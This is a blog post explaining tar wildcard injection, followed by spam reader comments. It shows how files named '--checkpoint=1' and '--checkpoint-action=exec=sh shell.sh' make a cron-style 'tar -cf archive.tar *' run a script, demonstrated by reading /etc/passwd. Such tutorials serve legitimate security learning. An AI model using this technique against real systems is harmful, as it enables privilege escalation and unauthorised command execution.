Code Execution With Tar Command

What is ‘tar’ command in linux?

The tar (tape archive) command is a frequently used command on linux that allows you to store files into an archive. This command is available by default on most linux systems and you do not need to install it separately.

Backup files with ‘tar’:

It can be found in many systems that the below command is executed in cronjob which takes a backup of all the files:

tar -cf archive.tar *

The above command creates an archive named “archive.tar” which stores all the files in the current location from where the command is executed.

Below screenshot shows test1 and test2 files gets archived when the above command is executed:

1

tar-example folder before executing tar command

2

tar-example folder after executing tar command

‘tar’ command has two options that can be exploited:

–checkpoint[=NUMBER]

Displays progress after every <NUMBER> record.

–checkpoint-action=ACTION

execute ACTION on each checkpoint

Exploiting ‘tar wildcard command:

We will create two blank files (using ‘touch’ command) but with certain parameters:

touch — “–checkpoint=1”

touch — “–checkpoint-action=exec=sh shell.sh”

shell.sh is a simple file with .sh extension.

Below contents are present in the shell.sh file:

cat /etc/passwd (this can be changed to any other command depending on requirement)

3

Shell.sh file

4

Current content of the folder tar-example

We have completed all the steps for running the exploit. It’s time to execute the exploit:

Run the below command again

Tar -cf archive.tar *

Voila !!! Our own command got executed.

5

‘passwd’ file displayed

6 thoughts on “Code Execution With Tar Command

  1. additional reading

    I just want to mention I am beginner to blogging and site-building and seriously enjoyed your web blog. Very likely I’m going to bookmark your website . You actually have fantastic contents. Cheers for revealing your blog.

  2. here are the findings

    I just want to mention I’m all new to blogs and definitely loved this blog site. Probably I’m going to bookmark your site . You certainly have very good article content. With thanks for sharing with us your website page.

  3. ICC T20 world cup 2016

    hey there and thank you for your information – I have certainly picked
    up anything new from right here. I did however expertise a few technical points using this
    website, since I experienced to reload the website many times previous
    to I could get it to load correctly. I had been wondering if your hosting is OK?
    Not that I’m complaining, but sluggish loading instances times will
    very frequently affect your placement in google and could damage your high quality score if advertising and marketing with
    Adwords. Anyway I’m adding this RSS to my e-mail and could
    look out for much more of your respective interesting content.

    Make sure you update this again soon.

  4. borvest inkral

    Thank you for sharing excellent informations. Your site is very cool. I’m impressed by the details that you have on this site. It reveals how nicely you understand this subject. Bookmarked this website page, will come back for more articles. You, my pal, ROCK! I found simply the information I already searched everywhere and just could not come across. What an ideal web site.

Leave a Reply

Your email address will not be published. Required fields are marked *